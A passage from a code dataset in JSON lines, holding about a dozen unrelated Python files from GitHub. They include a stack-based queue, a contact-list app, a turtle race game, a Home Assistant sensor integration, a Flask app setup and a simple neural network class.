sys.argv[i] == '-c':\n # Create data stream\n objKinesis.createKinesisDataStream(streamName, 4)\n if sys.argv[i] == '-d':\n # Delete data stream\n objKinesis.deleteKinesisDataStream(streamName)\n else:\n print('Please use -h for help')\n sys.exit()\n else:\n print('Please use -h for help')\n sys.exit()\n","repo_name":"ggverma/Console-Log-Analyzer","sub_path":"Utilities/KinesisHandler.py","file_name":"KinesisHandler.py","file_ext":"py","file_size_in_byte":3107,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"14485218559","text":"class Stack(object):\r\n def __init__(self, length):\r\n self.length = length\r\n self.vector = [None] * self.length\r\n self.top = -1\r\n \r\n def isEmpty(self):\r\n return self.top == -1\r\n \r\n def isFully(self):\r\n return self.top == self.length-1\r\n \r\n def push(self, element):\r\n if not self.isFully():\r\n self.top += 1\r\n self.vector[self.top] = element\r\n else:\r\n raise Exception('stack is fully')\r\n \r\n def pop(self):\r\n if not self.isEmpty():\r\n self.top -= 1\r\n return self.vector[self.top+1]\r\n else:\r\n raise Exception('stack is empty')\r\n\r\n\r\nclass Queue(object):\r\n\r\n def __init__(self, lenght):\r\n self.stack_one = Stack(lenght)\r\n self.stack_two = Stack(lenght)\r\n\r\n def insert(self, element):\r\n self.stack_one.push(element)\r\n\r\n def remove(self):\r\n while self.stack_one.top != -1:\r\n self.stack_two.push(self.stack_one.pop())\r\n\r\n aux = self.stack_two.pop()\r\n print(aux)\r\n\r\n while self.stack_two.top != -1:\r\n self.stack_one.push(self.stack_two.pop())\r\n\r\n return aux\r\n\r\n\r\nq = Queue(4)\r\nq.insert(0)\r\nq.insert(0)\r\nq.insert(0)\r\nq.insert(0)\r\n\r\nq.remove()\r\nq.remove()\r\nq.remove()\r\nq.remove()\r\n\r\n\r\n\r\n\r\n","repo_name":"lucasstonehc/Python","sub_path":"Exercicio5.py","file_name":"Exercicio5.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"33030083939","text":"\"\"\"\n\tMaster Historian\n\n\tCreated by Jan Tomesek on 4.9.2019.\n\"\"\"\n\n__author__ = \"Jan Tomesek\"\n__email__ = \"tomesek.j@gmail.com\"\n__copyright__ = \"Copyright 2019, Jan Tomesek\"\n\n\nimport os\nimport numpy as np\nimport time\nfrom statistics import mean\n\nclass MasterHistorian:\n \"\"\"\n Superclass for storing, writing and loading history.\n Provides epoch time measuring.\n \"\"\"\n\n def __init__(self, outputPath, tag='MasterHistorian'):\n self.outputPath = outputPath\n\n self.tag = tag\n\n self.startEpochTime = 0\n self.epochTimeHistory = []\n\n print('[{}] Initialized'.format(self.tag))\n\n def onEpochStart(self, epoch):\n # Start epoch time\n currentTime = time.strftime('%d-%m-%Y %H:%M:%S', time.localtime())\n print('[{}] {}: Epoch {} start'.format(self.tag, currentTime, epoch))\n\n self.startEpochTime = time.time()\n\n def onEpochEnd(self, epoch):\n # End epoch time\n endEpochTime = time.time()\n\n epochTime = endEpochTime - self.startEpochTime\n self.epochTimeHistory.append(epochTime)\n\n hours, minutes = self.__toHoursAndMinutes(epochTime)\n\n currentTime = time.strftime('%d-%m-%Y %H:%M:%S', time.localtime())\n print('[{}] {}: Epoch {} end (epoch took {}h {}min)'.format(self.tag, currentTime, epoch, hours, minutes))\n\n def __toHoursAndMinutes(self, seconds):\n hours = round(seconds // 3600)\n remaining = seconds - (hours * 3600)\n minutes = round(remaining // 60)\n\n return hours, minutes\n\n def showSummary(self):\n print('[{}] -------------------- Summary --------------------'.format(self.tag))\n print('')\n\n\n # Times\n print('[{}] -------- Times --------'.format(self.tag))\n\n # Epoch times\n for index, epochTime in enumerate(self.epochTimeHistory):\n hours, minutes = self.__toHoursAndMinutes(epochTime)\n print('[{}] Epoch {}: \\t {}h {}min'.format(self.tag, index+1, hours, minutes))\n print('')\n\n # Average epoch time\n averageEpochTime = mean(self.epochTimeHistory)\n averageHours, averageMinutes = self.__toHoursAndMinutes(averageEpochTime)\n print('[{}] Average: \\t {}h {}min'.format(self.tag, averageHours, averageMinutes))\n\n # Total epoch time\n totalEpochTime = sum(self.epochTimeHistory)\n totalHours, totalMinutes = self.__toHoursAndMinutes(totalEpochTime)\n print('[{}] Total: \\t {}h {}min'.format(self.tag, totalHours, totalMinutes))\n\n def load(self, overridden=False):\n self.epochTimeHistory = np.load(os.path.join(self.outputPath, 'epochTimeHistory'+'.npy')).tolist()\n\n if (not overridden):\n print('[{}] History successfully loaded'.format(self.tag))\n\n def write(self, overridden=False):\n np.save(os.path.join(self.outputPath, 'epochTimeHistory'), self.epochTimeHistory)\n\n if (not overridden):\n print('[{}] History successfully written'.format(self.tag))\n","repo_name":"JanTomesek/CrossLocate","sub_path":"CrossLocate/core/MasterHistorian.py","file_name":"MasterHistorian.py","file_ext":"py","file_size_in_byte":2992,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"63"} +{"seq_id":"1300710878","text":"#---------- 정답 입력 코드 -----------------\nimport datetime\nimport sys\nNUM = 1\nsys.stdin=open(f\"/Users/gimdongmin/Desktop/파이썬 알고리즘 강의/섹션 6/9. 수열 추측하기/in{NUM}.txt\",\"rt\")\nfile = open(f\"/Users/gimdongmin/Desktop/파이썬 알고리즘 강의/섹션 6/9. 수열 추측하기/out{NUM}.txt\")\nanswer = file.read()\nprint(f\"answer : \\n{answer}\")\nprint(f\"{'-'*50}\")\n#----------------------------------------\n\n#------------ 내 풀이 코드 -----------------\nfrom itertools import permutations\nimport time\ndef solution(): #permutations 이용\n start = time.time()\n n,f = map(int, input().split())\n lis = [i for i in range(1,n+1)]\n new = list(permutations(lis,n))\n for i in new:\n temp = list(i)\n for _ in range(n):\n for j in range(len(temp)-1):\n temp[j] = temp[j]+temp[j+1]\n if len(temp)>1:\n temp.pop()\n else:\n if temp[0] == f:\n for k in i:\n print(k,end=\" \")\n end = time.time()\n print(f\"{end - start:.5f} sec\")\n return\n# solution()\n\n#-----------영상 풀이 코드 -------------------\n# def dfs(l,sum):\n# global end\n# global start\n# if l==n and sum==f:\n# for x in p:\n# print(x, end=\" \")\n# end = time.time()\n# print(f\"{end - start:.5f} sec\")\n# sys.exit(0)\n# else:\n# for i in range(1,n+1):\n# if not ch[i]:\n# ch[i] = 1\n# p[l] = i\n# dfs(l+1,sum+(p[l]*b[l]))\n# ch[i] = 0\n#\n# start = time.time()\n# n,f = map(int, input().split())\n# p=[0]*n\n# b=[1]*n\n# ch=[0]*(n+1)\n# for i in range(1,n):\n# b[i] = (b[i-1]*(n-i))//i #이항계수 구하는 방법\n# dfs(0,0)\n\ndef library_solution(): #라이브러리 사용\n start = time.time()\n n, f = map(int, input().split())\n b=[1]*n\n for i in range(1,n):\n b[i] = (b[i-1]*(n-i))//i #이항계수 구하는 방법\n a = list(range(1,n+1))\n for tmp in permutations(a,n):\n check = 0\n for i,x in enumerate(tmp):\n check+=(x*b[i])\n if check == f:\n for k in tmp:\n print(k,end=\" \")\n end = time.time()\n print(f\"{end - start:.5f} sec\")\n return\nlibrary_solution()","repo_name":"kdm0320/Min_project","sub_path":"인프런 파이썬 강의/섹션6-(백트래킹, 상태트리, Cut Edge) - DFS/수열 추측하기.py","file_name":"수열 추측하기.py","file_ext":"py","file_size_in_byte":2485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"37544915378","text":"import collections\nimport getopt\nimport json\nimport random\nimport string\nimport sys\n\n\nARRAY_FRACTION = 0.5\n\n\nflat_paths = collections.defaultdict(lambda: set())\narray_paths = {}\n\n\ndef random_string(length=5):\n \"\"\"Generate a random string of fixed length\"\"\"\n letters = string.ascii_lowercase\n return ''.join(random.choice(letters) for i in range(length))\n\n\ndef random_value():\n \"\"\"Generate a random value to insert in the object\"\"\"\n return random.randint(0, 10000)\n\n\ndef random_path(length):\n \"\"\"Produce a random path of the given length\"\"\"\n return '.'.join(random_string() for _ in range(length))\n\n\ndef set_value(doc, path, value):\n \"\"\"Set a value at the dot-separated path string in the document\"\"\"\n parts = path.split('.')\n for part in parts[:-1]:\n if part not in doc:\n doc[part] = {}\n doc = doc[part]\n\n doc[parts[-1]] = value\n\n\ndef generate_json(num_attributes, total_nesting):\n \"\"\"Generate an object with the given number of attributes and nesting\"\"\"\n global array_paths, flat_paths\n\n # Partition attributes based on nesting\n nesting_indexes = set(range(total_nesting))\n nested_picks = set()\n for _ in range(num_attributes):\n n = random.choice(tuple(nesting_indexes))\n nesting_indexes.remove(n)\n nested_picks.add(n)\n\n # Group attributes by the nested depth\n nested_picks = list(sorted(nested_picks))\n attr_counts = collections.defaultdict(lambda: 0)\n for i in range(1, len(nested_picks)):\n attr_counts[nested_picks[i] - nested_picks[i - 1]] += 1\n nesting = sum(k * v for (k, v) in attr_counts.items())\n attr_counts[total_nesting - nesting] += 1\n attr_counts = dict(attr_counts)\n\n # Decide if each attribute should be flat or an array\n array_counts = {}\n flat_counts = {}\n for (k, v) in attr_counts.items():\n if random.random() > ARRAY_FRACTION:\n array_counts[k] = v\n else:\n flat_counts[k] = v\n\n # Generate new array paths if needed\n for (depth, _) in array_counts.items():\n if depth not in array_paths:\n new_path = random_path(depth)\n while new_path in array_paths.values():\n new_path = random_path(depth)\n array_paths[depth] = new_path\n\n # Generate new flat paths if needed\n for (depth, count) in flat_counts.items():\n while len(flat_paths[depth]) < count:\n new_path = random_path(depth)\n while new_path in flat_paths[depth]:\n new_path = random_path(depth)\n flat_paths[depth].add(new_path)\n\n doc = {}\n\n # Assign array values\n for (depth, count) in array_counts.items():\n set_value(doc,\n array_paths[depth],\n [random_value() for _ in range(depth)])\n\n # Assign flat values\n for (depth, count) in flat_counts.items():\n for path in random.sample(flat_paths[depth], count):\n set_value(doc, path, random_value())\n\n return doc\n\n\ndef usage(out=sys.stdout):\n \"\"\"Print usage information\"\"\"\n out.write(' '.join([\n 'usage: %s' % sys.argv[0],\n '[-c|--count ]',\n '[-a|--atributes ]',\n '[-n|--nesting ]\\n'\n ]))\n\n\ndef main():\n try:\n opts, _ = getopt.getopt(sys.argv[1:],\n 'hc:a:n:',\n ['help', 'count=', 'attributes=', 'nesting='])\n except getopt.GetoptError as err:\n sys.stderr.write(str(err) + '\\n')\n usage(sys.stderr)\n sys.exit(2)\n\n count = 10\n attributes = 10\n nesting = 20\n for opt, value in opts:\n if opt in (\"-h\", \"--help\"):\n usage()\n sys.exit()\n elif opt in (\"-c\", \"--count\"):\n count = int(value)\n elif opt in (\"-a\", \"--attributes\"):\n attributes = int(value)\n elif opt in (\"-n\", \"--nesting\"):\n nesting = int(value)\n else:\n assert False, \"unhandled option\"\n\n for _ in range(count):\n print(json.dumps(generate_json(attributes, nesting)))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"michaelmior/random-json","sub_path":"gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":4128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"70677116682","text":"import json\nclass ContactList:\n \n def __init__(self):\n self.contacts = []\n \n\n def load(self):\n file = open('contacts.json', 'r')\n data = json.loads(file.read())\n dictionaries = data['contacts']\n self.contacts = dictionaries\n \n \n def count(self):\n return len(self.contacts)\n\n \n def save(self): \n self_dict = {}\n self_dict.update({'contacts' : self.contacts})\n with open('contacts.json' , 'w') as file :\n saved = json.dumps(self_dict)\n file.write(saved)\n file.close()\n \n \n def print(self): \n for x in range(len(self.contacts)) :\n print(self.contacts[x]['name'])\n print(self.contacts[x]['phone_number'])\n print(self.contacts[x]['email'])\n print(\" \")\n \n\n def add(self, name, phone_number, email):\n new_contact = {\n 'name' : name ,\n 'phone_number' : phone_number ,\n 'email' : email\n }\n self.contacts.append(new_contact)\n print(self.contacts)\n\n \n def remove(self, name):\n for x in range(len(self.contacts)) :\n if self.contacts[x]['name'] == name :\n del self.contacts[x]\n break\n \n \n def update(self, old_name, new_name, new_phone_number, new_email):\n for x in range(len(self.contacts)) :\n if self.contacts[x]['name'] == old_name :\n self.contacts[x]['name'] = new_name\n self.contacts[x]['phone_number'] = new_phone_number\n self.contacts[x]['email'] = new_email\n\n\n\n\ncontact_list = ContactList() \ncontact_list.load()\nprint('Welcome to the Contact List App (CLA)')\nwhile True:\n command = input('Enter a command: ')\n if command == 'load':\n contact_list.load()\n print(f'Loaded ${contact_list.count()} contacts.')\n elif command == 'save':\n contact_list.save()\n print(f'Saved ${contact_list.count()} contacts.')\n elif command == 'print':\n contact_list.print()\n elif command == 'add':\n print('Enter info of contact to add:')\n name = input('Name: ')\n phone_number = input('Phone Number: ')\n email = input('Email: ')\n contact_list.add(name, phone_number, email)\n elif command == 'remove':\n name = input('Name of contact to remove: ')\n contact_list.remove(name)\n elif command == 'update':\n print('Enter info of contact to add:')\n old_name = input('Name of contact to update: ')\n new_name = input('New Name: ')\n new_phone_number = input('New Phone Number: ')\n new_email = input('New Email: ')\n contact_list.update(old_name, new_name, new_phone_number, new_email)\n elif command == 'help':\n print('Available commands:')\n print('load - load all contacts from the file')\n print('save - save contacts to a file')\n print('print - print all contacts')\n print('add - add a new contact')\n print('remove - remove a contact')\n print('update - update a contact')\n print('exit - exit the program')\n elif command == 'exit':\n break\n else:\n print('Command not recognized')\n","repo_name":"PdxCodeGuild/HB3","sub_path":"code/kelsie/lab09/lab09_kelsie.py","file_name":"lab09_kelsie.py","file_ext":"py","file_size_in_byte":3296,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"63"} +{"seq_id":"72158601161","text":"from __future__ import print_function\n\nimport os\nimport subprocess\nimport sys\n\nfrom distutils.command.build import build # type: ignore\n\nfrom setuptools import (\n find_packages,\n setup,\n Command\n)\n\nimport sciencebeam_trainer_delft\n\n\nwith open(os.path.join('requirements.txt'), 'r') as f:\n REQUIRED_PACKAGES = f.readlines()\n\nwith open(os.path.join('requirements.delft.txt'), 'r') as f:\n DELFT_PACKAGES = f.readlines()\n\nwith open('README.md', 'r') as f:\n long_description = f.read()\n\n\ndef _run_command(command_args):\n print('Running command: %s' % command_args)\n with subprocess.Popen(\n command_args,\n stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT\n ) as process:\n stdout_data, _ = process.communicate()\n print('Command output: %s' % stdout_data)\n if process.returncode != 0:\n raise RuntimeError(\n 'Command %s failed: exit code: %s (output: %s)' %\n (command_args, process.returncode, stdout_data)\n )\n\n\ndef _is_delft_installed():\n try:\n import delft # noqa pylint: disable=unused-import, import-outside-toplevel\n return True\n except ImportError:\n return False\n\n\ndef _install_delft():\n _run_command(\n [sys.executable, '-m', 'pip', 'install', '--no-deps']\n + DELFT_PACKAGES\n )\n\n\ndef _install_delft_if_not_installed():\n if _is_delft_installed():\n print('delft already installed, skipping')\n else:\n _install_delft()\n\n\nclass CustomCommands(Command):\n def initialize_options(self):\n pass\n\n def finalize_options(self):\n pass\n\n def run(self):\n _install_delft_if_not_installed()\n\n\nclass CustomBuild(build):\n \"\"\"A build command class that will be invoked during package install.\n The package built using the current setup.py will be staged and later\n installed in the worker using `pip install package'. This class will be\n instantiated during install for this specific scenario and will trigger\n running the custom commands specified.\n \"\"\"\n sub_commands = build.sub_commands + [('CustomCommands', None)]\n\n\npackages = find_packages()\n\nsetup(\n name='sciencebeam_trainer_delft',\n version=sciencebeam_trainer_delft.__version__,\n install_requires=REQUIRED_PACKAGES,\n packages=packages,\n include_package_data=True,\n description='ScienceBeam Trainer DeLFT',\n cmdclass={\n 'build': CustomBuild,\n 'CustomCommands': CustomCommands\n },\n url='https://github.com/elifesciences/sciencebeam-trainer-delft',\n license='MIT',\n keywords=\"sciencebeam delft\",\n long_description=long_description,\n long_description_content_type='text/markdown'\n)\n","repo_name":"elifesciences/sciencebeam-trainer-delft","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2723,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"63"} +{"seq_id":"26261487191","text":"import logging\n\nfrom homeassistant.core import HomeAssistant, callback\nfrom homeassistant.config_entries import ConfigEntry\nfrom homeassistant.helpers.typing import ConfigType, DiscoveryInfoType\nfrom homeassistant.helpers.entity_platform import AddEntitiesCallback\nfrom homeassistant.helpers.update_coordinator import CoordinatorEntity\n\nfrom homeassistant.components.sensor import (\n SensorDeviceClass,\n SensorEntity,\n SensorStateClass,\n SensorEntityDescription,\n)\nfrom homeassistant.const import (\n UnitOfTemperature,\n ATTR_UNIT_OF_MEASUREMENT,\n)\nfrom .coordinator import getCoordinator\n\n_LOGGER = logging.getLogger(__name__)\n\ndef discover_sensors(cts600):\n \"\"\" Create entity descriptors based on scanning the CTS600 data menu. \"\"\"\n data = cts600.data\n metaData = cts600.metaData\n sensors = []\n\n for e in data:\n sed = SensorEntityDescription(key = e, name = e.replace('_', ' ').lower())\n description = metaData[e]['description'] if e in metaData and 'description' in metaData[e] else None\n kind = metaData[e]['kind'] if e in metaData and 'kind' in metaData[e] else None\n\n if description:\n sed.name = sed.name + \" (\" + description.replace('_', ' ').capitalize() + \")\"\n\n if kind == 'temperature':\n sed.name = sed.name[0].upper() + sed.name[1:]\n sed.state_class = SensorStateClass.MEASUREMENT\n sed.device_class = SensorDeviceClass.TEMPERATURE\n sed.native_unit_of_measurement = UnitOfTemperature.CELSIUS\n\n sensors.append(sed)\n\n return sensors\n\nasync def async_setup_entry(hass: HomeAssistant, entry: ConfigEntry, async_add_entities: AddEntitiesCallback) -> None:\n \"\"\" foo \"\"\"\n _LOGGER.debug (\"%s setup_entry: %s\", __name__, entry.data)\n await async_setup_platform (hass, entry.data, async_add_entities)\n\nasync def async_setup_platform(\n hass: HomeAssistant,\n config: ConfigType,\n async_add_entities: AddEntitiesCallback,\n discovery_info: DiscoveryInfoType | None = None,\n) -> None:\n \"\"\"Set up the platform.\"\"\"\n coordinator = await getCoordinator (hass, config)\n await coordinator.updateData()\n discovered_sensors = discover_sensors(coordinator.cts600)\n async_add_entities([CTS600Sensor (coordinator, e, None) for e in discovered_sensors], update_before_add=True)\n\nclass CTS600Sensor(CoordinatorEntity, SensorEntity):\n \"\"\"An entity using CoordinatorEntity.\n\n The CoordinatorEntity class provides:\n should_poll\n async_update\n async_added_to_hass\n available\n\n \"\"\"\n\n def __init__(\n self, coordinator, description: SensorEntityDescription, entry_id: str\n ) -> None:\n \"\"\"Pass coordinator to CoordinatorEntity.\"\"\"\n super().__init__(coordinator)\n # self._attr_name = DOMAIN + \"_\" + spec[\"name\"]\n # self._attr_state_class = spec[\"state-class\"]\n # self._attr_device_class = spec[\"device-class\"]\n # self._attr_native_unit_of_measurement = spec[\"unit\"]\n\n self._name = coordinator.name + \" \" + description.name\n self._attr_device_info = coordinator.device_info\n self.entity_description = description\n self._attr_unique_id = f\"serial-{self.coordinator.cts600.port}-{description.key}\"\n\n @callback\n def _handle_coordinator_update(self) -> None:\n \"\"\"Handle updated data from the coordinator.\"\"\"\n # _LOGGER.debug(\"Entity update: %s\", self.coordinator.data)\n value = self.coordinator.cts600.data.get(self.entity_description.key)\n if value != self._attr_native_value:\n self._attr_native_value = value\n self.async_write_ha_state()\n\n @property\n def name (self):\n \"\"\"Return the name of the climate device.\"\"\"\n return self._name\n","repo_name":"frodef/nilan-cts600-homeassistant","sub_path":"custom_components/nilan_cts600/sensor.py","file_name":"sensor.py","file_ext":"py","file_size_in_byte":3782,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} +{"seq_id":"42882684987","text":"class Product:\n\n def __init__(self, name, price, category, id):\n self.name = name\n self.price = price\n self.category = category\n self.id = id\n\n def update_price(self, percent_change, is_increased):\n if (is_increased == True):\n self.price *= (1 + percent_change)\n elif (is_increased == False):\n self.price *= (1 - percent_change)\n return self\n \n def print_info(self):\n print(\"Name:\", self.name)\n print(f\"Price: {self.price:.2f}\")\n print(\"Category\", self.category)\n return self","repo_name":"jcheung83/Programming-Folder","sub_path":"Python/Store/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"4628504412","text":"# Day 19 Project: Ready, Set, Turtle Power!\r\n\r\nimport random\r\nfrom turtle import Turtle, Screen\r\n\r\nscreen = Screen()\r\nstart_y = -150\r\nscreen.setup(width=500, height=400)\r\nis_race_on = False\r\n\r\nuser_bet = screen.textinput(title=\"Make your bet\", prompt=\"Which turtle will win the race? Enter a color: \")\r\ncolors = [\"red\", \"orange\", \"gold\", \"green\", \"blue\", \"purple\"]\r\nturtles = []\r\n\r\n# Create a turtle for each available color\r\nfor color in colors:\r\n new_turtle = Turtle(shape=\"turtle\")\r\n new_turtle.color(color)\r\n new_turtle.penup()\r\n new_turtle.goto(x=-230, y=start_y)\r\n start_y += 60\r\n turtles.append(new_turtle)\r\n\r\nif user_bet:\r\n is_race_on = True\r\n\r\nwhile is_race_on:\r\n\r\n for turtle in turtles:\r\n if turtle.xcor() > 230:\r\n is_race_on = False\r\n winning_color = turtle.pencolor()\r\n if winning_color == user_bet:\r\n print(f\"You've won! The {winning_color} turtle is the winner!\")\r\n else:\r\n print(f\"You've lost! The {winning_color} turtle is the winner!\")\r\n break\r\n\r\n rand_distance = random.randint(0, 10)\r\n turtle.forward(rand_distance)\r\n\r\nscreen.exitonclick()\r\n","repo_name":"mdelgadonyc/100days_of_code","sub_path":"project_day_019/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"73199081482","text":"n1 = input()\nli = []\nfor p in range(10):\n li.append(n1.count(str(p)))\nif max(li) == li[6] or max(li) == li[9]:\n a = (li[6] + li[9]) / 2\n a += 0.1\n print(round(a))\nelse:\n print(max(li))\n","repo_name":"kekemaster/4week","sub_path":"4week/방번호 count.py","file_name":"방번호 count.py","file_ext":"py","file_size_in_byte":200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"34514199973","text":"import os\n\nfrom flask import Flask, render_template, flash\nfrom flask_wtf.csrf import CSRFProtect\nfrom flask_cors import CORS\nimport logging.handlers\n\nfrom core.route import blueprints\nfrom core import utils, constants\nimport settings\n\n\n# Create APP\napp = Flask(__name__)\ncsrf = CSRFProtect(app)\n\napp.config['CORS_HEADERS'] = 'Content-Type'\ncors_config = {\n \"origins\": [\"https://assets.crossref.org\"]\n}\nCORS(app, resources={r\"/*\": cors_config})\n\nutils.set_base_path(app.root_path)\napp.config.from_object(settings)\nutils.set_app_config(app.config)\n\napp.config['SECRET_KEY'] = utils.get_app_config('SECRET_KEY')\napp.config['SESSION_COOKIE_NAME'] = 'crossref_session'\napp.config['SESSION_COOKIE_SECURE'] = True\napp.config['SESSION_COOKIE_HTTPONLY'] = True\napp.config['PERMANENT_SESSION_LIFETIME'] = utils.get_app_config('SESSION_LIFETIME')\n\nblueprints.register_blueprints(app)\n\n\n# Logger configuration\nlogFormatter = logging.Formatter(\"%(asctime)s [%(threadName)-12.12s] [%(levelname)-5.5s] %(message)s\")\nrootLogger = logging.getLogger(__name__)\n\n# fileHandler = logging.handlers.RotatingFileHandler(os.path.join(app.root_path, \"logs\", \"app.log\"),\n# maxBytes=(1048576*5), backupCount=5)\n# fileHandler.setFormatter(logFormatter)\n# rootLogger.addHandler(fileHandler)\n\nconsoleHandler = logging.StreamHandler()\nconsoleHandler.setFormatter(logFormatter)\nrootLogger.addHandler(consoleHandler)\n\nrootLogger.setLevel(logging.INFO)\nlogging.getLogger('werkzeug').setLevel(logging.ERROR)\nlogging.getLogger('requests').setLevel(logging.ERROR)\nformatter = logging.Formatter('[%(asctime)s] p%(process)s {%(pathname)s:%(lineno)d} %(levelname)s - %(message)s','%m-%d %H:%M:%S')\n\n\n@app.errorhandler(400)\ndef error_400(e):\n app.logger.error(e)\n return render_template('400.html'), 400\n\n\n@app.errorhandler(401)\ndef error_401(e):\n app.logger.error(e)\n return render_template('401.html'), 401\n\n\n@app.errorhandler(404)\ndef error_404(e):\n app.logger.error(e)\n return render_template('404.html'), 404\n\n\n@app.errorhandler(500)\ndef error_500(e):\n return render_template('500.html'), 500\n\n\n@app.context_processor\ndef user_info():\n signed_in, info, session_expired = utils.signed_in_info()\n context_dict = {'signed_in': signed_in, 'orcid_info': info}\n if session_expired:\n flash(constants.ORCID_SESSION_EXPIRED, constants.MESSAGE_TYPE_WARN)\n return context_dict\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=os.environ.get(\"PORT\", 5000), debug=os.environ.get(\"DEBUG\", False))\n","repo_name":"CottageLabs/crossref_search","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"70702396042","text":"import pandas as pd\r\nfrom openpyxl import load_workbook\r\n\r\n# Cargar el archivo de Excel\r\nfile_path = r\"insertar ruta del archivo\"\r\nworkbook = load_workbook(file_path)\r\nsheet_names = workbook.sheetnames\r\n\r\n# Crear un nuevo archivo de Excel para guardar los resultados\r\noutput_file = \"nombre_archivo_procesado.xlsx\"\r\nwriter = pd.ExcelWriter(output_file, engine='openpyxl')\r\n\r\n# Procesar cada hoja en el archivo\r\nfor sheet_name in sheet_names:\r\n # Leer la hoja actual\r\n data = pd.read_excel(file_path, sheet_name=sheet_name, skiprows=3)\r\n\r\n # Eliminar las primeras 4 columnas\r\n data = data.iloc[:, 4:]\r\n\r\n # Función para dividir las celdas basándose en saltos de página\r\n def split_cell(cell):\r\n if \"\\n\" in str(cell):\r\n return cell.split(\"\\n\")\r\n else:\r\n return [cell, None, None]\r\n\r\n # Aplicar la función de división solo a las columnas L en adelante\r\n for col in data.columns[7:]:\r\n new_cols = data[col].apply(split_cell).apply(pd.Series)\r\n new_cols.columns = [f\"{col}_1\", f\"{col}_2\", f\"{col}_3\"]\r\n data = pd.concat([data, new_cols], axis=1)\r\n data.drop(col, axis=1, inplace=True)\r\n\r\n # Guardar la hoja procesada en el nuevo archivo de Excel\r\n data.to_excel(writer, sheet_name=sheet_name, index=False)\r\n\r\n# Guardar y cerrar el archivo de Excel\r\nwriter.save()\r\nprint(f\"Datos procesados y guardados en {output_file}\")\r\n","repo_name":"AlejandrOropeza/ScriptsPortfolio","sub_path":"limpieza.py","file_name":"limpieza.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"3236063659","text":"#!/usr/bin/env python3\n\"\"\"10. NeuralNetwork Forward Propagation\"\"\"\nimport numpy as np\n\n\nclass NeuralNetwork:\n \"\"\"a class that defines a neural network with one hidden layer\"\"\"\n def __init__(self, nx, nodes):\n \"\"\"Initializes the class\"\"\"\n if type(nx) != int:\n raise TypeError(\"nx must be an integer\")\n if nx < 1:\n raise ValueError(\"nx must be a positive integer\")\n if type(nodes) != int:\n raise TypeError(\"nodes must be an integer\")\n if nodes < 1:\n raise ValueError(\"nodes must be a positive integer\")\n self.__W1 = np.random.randn(nodes, nx)\n self.__b1 = np.zeros((nodes, 1))\n self.__A1 = 0\n self.__W2 = np.random.randn(1, nodes)\n self.__b2 = 0\n self.__A2 = 0\n\n def forward_prop(self, X):\n \"\"\"iCalculates the forward propagation of the neural network\"\"\"\n Z1 = np.matmul(self.__W1, X) + self.__b1\n self.__A1 = 1 / (1 + np.exp(-Z1))\n Z2 = np.matmul(self.__W2, self.__A1) + self.__b2\n self.__A2 = 1 / (1 + np.exp(-Z2))\n return (self.__A1, self.__A2)\n\n @property\n def W1(self):\n \"\"\"Function for the weights vector for the hidden layer\"\"\"\n return self.__W1\n\n @property\n def b1(self):\n \"\"\"Function for the bias for the hidden layer\"\"\"\n return self.__b1\n\n @property\n def A1(self):\n \"\"\"Function for the activated output for the hidden layer\"\"\"\n return self.__A1\n\n @property\n def W2(self):\n \"\"\"Function for the weights vector for the output neuron\"\"\"\n return self.__W2\n\n @property\n def b2(self):\n \"\"\"Function for the bias for the output neuron\"\"\"\n return self.__b2\n\n @property\n def A2(self):\n \"\"\"Function for the activated output for the output neuron\"\"\"\n return self.__A2\n","repo_name":"rubenoliveros/holbertonschool-machine_learning","sub_path":"supervised_learning/0x01-classification/10-neural_network.py","file_name":"10-neural_network.py","file_ext":"py","file_size_in_byte":1855,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"28044768727","text":"from datetime import date\nfrom dateutil.rrule import rrule\nimport pandas as pd\nfrom cashflow import CashFlow\n\n\nclass Life:\n \"\"\"A person's life\n \n Attributes:\n date_born (date): The date the person was born (for calculating current age)\n \"\"\"\n\n def __init__(self, date_born: date, cashflows: list[CashFlow] = []):\n self.age_current = self.calc_age(date_born)\n self.cashflows = cashflows\n\n @staticmethod\n def calc_age(birth_date: date) -> int:\n \"\"\"Calculate age, given a birthday.\n\n Args:\n birth_date (date): The birth date from which age will be calculated.\n\n Returns:\n int: The age of the person.\n \"\"\"\n today = date.today()\n birthday_happened = (today.month, today.day) < (\n birth_date.month,\n birth_date.day,\n )\n return today.year - birth_date.year - birthday_happened\n\n def generate_financial_forecast(self, date_start: date, date_end: date):\n \"\"\"Generates a financial forecast based off of user-defined cashflows and\n existing funds.\n\n Args:\n date_start (date): The start date of the forecast\n date_end (date): The end date of the forecast\n \"\"\"\n self.forecast = pd.DataFrame(\n index=pd.date_range(start=date_start, end=date_end, freq=\"D\"),\n columns=[\"Net Cashflow\", \"Cashflows\"],\n )\n self.forecast[\"Net 